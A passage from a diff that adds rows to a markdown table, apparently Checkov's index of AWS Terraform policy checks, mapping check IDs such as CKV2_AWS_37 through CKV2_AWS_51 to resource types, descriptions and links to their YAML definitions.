+| 1415 | CKV2_AWS_37              | resource                         | aws_storagegateway_smb_file_share                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1416 | CKV2_AWS_37              | resource                         | aws_storagegateway_upload_buffer                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1417 | CKV2_AWS_37              | resource                         | aws_storagegateway_working_storage                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1418 | CKV2_AWS_37              | resource                         | aws_subnet                                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1419 | CKV2_AWS_37              | resource                         | aws_swf_domain                                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1420 | CKV2_AWS_37              | resource                         | aws_transfer_server                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1421 | CKV2_AWS_37              | resource                         | aws_transfer_ssh_key                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1422 | CKV2_AWS_37              | resource                         | aws_transfer_user                                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1423 | CKV2_AWS_37              | resource                         | aws_volume_attachment                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1424 | CKV2_AWS_37              | resource                         | aws_vpc                                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1425 | CKV2_AWS_37              | resource                         | aws_vpc_dhcp_options                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1426 | CKV2_AWS_37              | resource                         | aws_vpc_dhcp_options_association                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1427 | CKV2_AWS_37              | resource                         | aws_vpc_endpoint                                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1428 | CKV2_AWS_37              | resource                         | aws_vpc_endpoint_connection_notification                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1429 | CKV2_AWS_37              | resource                         | aws_vpc_endpoint_route_table_association                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1430 | CKV2_AWS_37              | resource                         | aws_vpc_endpoint_service                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1431 | CKV2_AWS_37              | resource                         | aws_vpc_endpoint_service_allowed_principal                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1432 | CKV2_AWS_37              | resource                         | aws_vpc_endpoint_subnet_association                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1433 | CKV2_AWS_37              | resource                         | aws_vpc_ipv4_cidr_block_association                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1434 | CKV2_AWS_37              | resource                         | aws_vpc_peering_connection                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1435 | CKV2_AWS_37              | resource                         | aws_vpc_peering_connection_accepter                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1436 | CKV2_AWS_37              | resource                         | aws_vpc_peering_connection_options                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1437 | CKV2_AWS_37              | resource                         | aws_vpn_connection                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1438 | CKV2_AWS_37              | resource                         | aws_vpn_connection_route                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1439 | CKV2_AWS_37              | resource                         | aws_vpn_gateway                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1440 | CKV2_AWS_37              | resource                         | aws_vpn_gateway_attachment                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1441 | CKV2_AWS_37              | resource                         | aws_vpn_gateway_route_propagation                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1442 | CKV2_AWS_37              | resource                         | aws_waf_byte_match_set                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1443 | CKV2_AWS_37              | resource                         | aws_waf_geo_match_set                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1444 | CKV2_AWS_37              | resource                         | aws_waf_ipset                                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1445 | CKV2_AWS_37              | resource                         | aws_waf_rate_based_rule                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1446 | CKV2_AWS_37              | resource                         | aws_waf_regex_match_set                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1447 | CKV2_AWS_37              | resource                         | aws_waf_regex_pattern_set                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1448 | CKV2_AWS_37              | resource                         | aws_waf_rule                                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1449 | CKV2_AWS_37              | resource                         | aws_waf_rule_group                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1450 | CKV2_AWS_37              | resource                         | aws_waf_size_constraint_set                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1451 | CKV2_AWS_37              | resource                         | aws_waf_sql_injection_match_set                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1452 | CKV2_AWS_37              | resource                         | aws_waf_web_acl                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1453 | CKV2_AWS_37              | resource                         | aws_waf_xss_match_set                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1454 | CKV2_AWS_37              | resource                         | aws_wafregional_byte_match_set                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1455 | CKV2_AWS_37              | resource                         | aws_wafregional_geo_match_set                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1456 | CKV2_AWS_37              | resource                         | aws_wafregional_ipset                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1457 | CKV2_AWS_37              | resource                         | aws_wafregional_rate_based_rule                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1458 | CKV2_AWS_37              | resource                         | aws_wafregional_regex_match_set                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1459 | CKV2_AWS_37              | resource                         | aws_wafregional_regex_pattern_set                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1460 | CKV2_AWS_37              | resource                         | aws_wafregional_rule                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1461 | CKV2_AWS_37              | resource                         | aws_wafregional_rule_group                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1462 | CKV2_AWS_37              | resource                         | aws_wafregional_size_constraint_set                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1463 | CKV2_AWS_37              | resource                         | aws_wafregional_sql_injection_match_set                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1464 | CKV2_AWS_37              | resource                         | aws_wafregional_web_acl                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1465 | CKV2_AWS_37              | resource                         | aws_wafregional_web_acl_association                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1466 | CKV2_AWS_37              | resource                         | aws_wafregional_xss_match_set                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1467 | CKV2_AWS_37              | resource                         | aws_wafv2_ip_set                                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1468 | CKV2_AWS_37              | resource                         | aws_wafv2_regex_pattern_set                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1469 | CKV2_AWS_37              | resource                         | aws_wafv2_rule_group                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1470 | CKV2_AWS_37              | resource                         | aws_wafv2_web_acl                                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1471 | CKV2_AWS_37              | resource                         | aws_wafv2_web_acl_association                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1472 | CKV2_AWS_37              | resource                         | aws_wafv2_web_acl_logging_configuration                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1473 | CKV2_AWS_37              | resource                         | aws_worklink_fleet                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1474 | CKV2_AWS_37              | resource                         | aws_worklink_website_certificate_authority_association                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1475 | CKV2_AWS_37              | resource                         | aws_workspaces_directory                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1476 | CKV2_AWS_37              | resource                         | aws_workspaces_ip_group                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1477 | CKV2_AWS_37              | resource                         | aws_workspaces_workspace                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1478 | CKV2_AWS_37              | resource                         | aws_xray_sampling_rule                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+| 1479 | CKV2_AWS_38              | resource                         | aws_route53_zone                                                                                 | Ensure Domain Name System Security Extensions (DNSSEC) signing is enabled for Amazon Route 53 public hosted zones                                                                                        | Terraform               | [Route53ZoneEnableDNSSECSigning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ZoneEnableDNSSECSigning.yaml)                                                           |
+| 1480 | CKV2_AWS_39              | resource                         | aws_route53_zone                                                                                 | Ensure Domain Name System (DNS) query logging is enabled for Amazon Route 53 hosted zones                                                                                                                | Terraform               | [Route53ZoneHasMatchingQueryLog.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ZoneHasMatchingQueryLog.yaml)                                                           |
+| 1481 | CKV2_AWS_40              | resource                         | aws_iam_group_policy                                                                             | Ensure AWS IAM policy does not allow full IAM privileges                                                                                                                                                 | Terraform               | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml)                                                           |
+| 1482 | CKV2_AWS_40              | resource                         | aws_iam_policy                                                                                   | Ensure AWS IAM policy does not allow full IAM privileges                                                                                                                                                 | Terraform               | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml)                                                           |
+| 1483 | CKV2_AWS_40              | resource                         | aws_iam_role_policy                                                                              | Ensure AWS IAM policy does not allow full IAM privileges                                                                                                                                                 | Terraform               | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml)                                                           |
+| 1484 | CKV2_AWS_40              | resource                         | aws_iam_user_policy                                                                              | Ensure AWS IAM policy does not allow full IAM privileges                                                                                                                                                 | Terraform               | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml)                                                           |
+| 1485 | CKV2_AWS_40              | resource                         | aws_ssoadmin_permission_set_inline_policy                                                        | Ensure AWS IAM policy does not allow full IAM privileges                                                                                                                                                 | Terraform               | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml)                                                           |
+| 1486 | CKV2_AWS_40              | resource                         | data.aws_iam_policy_document                                                                     | Ensure AWS IAM policy does not allow full IAM privileges                                                                                                                                                 | Terraform               | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml)                                                           |
+| 1487 | CKV2_AWS_41              | resource                         | aws_instance                                                                                     | Ensure an IAM role is attached to EC2 instance                                                                                                                                                           | Terraform               | [EC2InstanceHasIAMRoleAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EC2InstanceHasIAMRoleAttached.yaml)                                                             |
+| 1488 | CKV2_AWS_42              | resource                         | aws_cloudfront_distribution                                                                      | Ensure AWS CloudFront distribution uses custom SSL certificate                                                                                                                                           | Terraform               | [CloudFrontHasCustomSSLCertificate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontHasCustomSSLCertificate.yaml)                                                     |
+| 1489 | CKV2_AWS_43              | resource                         | aws_s3_bucket_acl                                                                                | Ensure S3 Bucket does not allow access to all Authenticated users                                                                                                                                        | Terraform               | [S3NotAllowAccessToAllAuthenticatedUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3NotAllowAccessToAllAuthenticatedUsers.yaml)                                         |
+| 1490 | CKV2_AWS_44              | resource                         | aws_route                                                                                        | Ensure AWS route table with VPC peering does not contain routes overly permissive to all traffic                                                                                                         | Terraform               | [VPCPeeringRouteTableOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml)                                               |
+| 1491 | CKV2_AWS_44              | resource                         | aws_route_table                                                                                  | Ensure AWS route table with VPC peering does not contain routes overly permissive to all traffic                                                                                                         | Terraform               | [VPCPeeringRouteTableOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml)                                               |
+| 1492 | CKV2_AWS_45              | resource                         | aws_config_configuration_recorder                                                                | Ensure AWS Config recorder is enabled to record all supported resources                                                                                                                                  | Terraform               | [AWSConfigRecorderEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSConfigRecorderEnabled.yaml)                                                                       |
+| 1493 | CKV2_AWS_45              | resource                         | aws_config_configuration_recorder_status                                                         | Ensure AWS Config recorder is enabled to record all supported resources                                                                                                                                  | Terraform               | [AWSConfigRecorderEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSConfigRecorderEnabled.yaml)                                                                       |
+| 1494 | CKV2_AWS_46              | resource                         | aws_cloudfront_distribution                                                                      | Ensure AWS CloudFront Distribution with S3 have Origin Access set to enabled                                                                                                                             | Terraform               | [CLoudFrontS3OriginConfigWithOAI.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CLoudFrontS3OriginConfigWithOAI.yaml)                                                         |
+| 1495 | CKV2_AWS_47              | resource                         | aws_cloudfront_distribution                                                                      | Ensure AWS CloudFront attached WAFv2 WebACL is configured with AMR for Log4j Vulnerability                                                                                                               | Terraform               | [CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml)                       |
+| 1496 | CKV2_AWS_47              | resource                         | aws_wafv2_web_acl                                                                                | Ensure AWS CloudFront attached WAFv2 WebACL is configured with AMR for Log4j Vulnerability                                                                                                               | Terraform               | [CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml)                       |
+| 1497 | CKV2_AWS_48              | resource                         | aws_config_configuration_recorder                                                                | Ensure AWS Config must record all possible resources                                                                                                                                                     | Terraform               | [ConfigRecorderRecordsAllGlobalResources.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ConfigRecorderRecordsAllGlobalResources.yaml)                                         |
+| 1498 | CKV2_AWS_49              | resource                         | aws_dms_endpoint                                                                                 | Ensure AWS Database Migration Service endpoints have SSL configured                                                                                                                                      | Terraform               | [DMSEndpointHaveSSLConfigured.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/DMSEndpointHaveSSLConfigured.yaml)                                                               |
+| 1499 | CKV2_AWS_50              | resource                         | aws_elasticache_replication_group                                                                | Ensure AWS ElastiCache Redis cluster with Multi-AZ Automatic Failover feature set to enabled                                                                                                             | Terraform               | [ElastiCacheRedisConfiguredAutomaticFailOver.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElastiCacheRedisConfiguredAutomaticFailOver.yaml)                                 |
+| 1500 | CKV2_AWS_51              | resource                         | aws_api_gateway_stage                                                                            | Ensure AWS API Gateway endpoints uses client certificate authentication                                                                                                                                  | Terraform               | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml)                 |
+| 1501 | CKV2_AWS_51              | resource                         | aws_apigatewayv2_api                                                                             | Ensure AWS API Gateway endpoints uses client certificate authentication                                                                                                                                  | Terraform               | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml)                 |
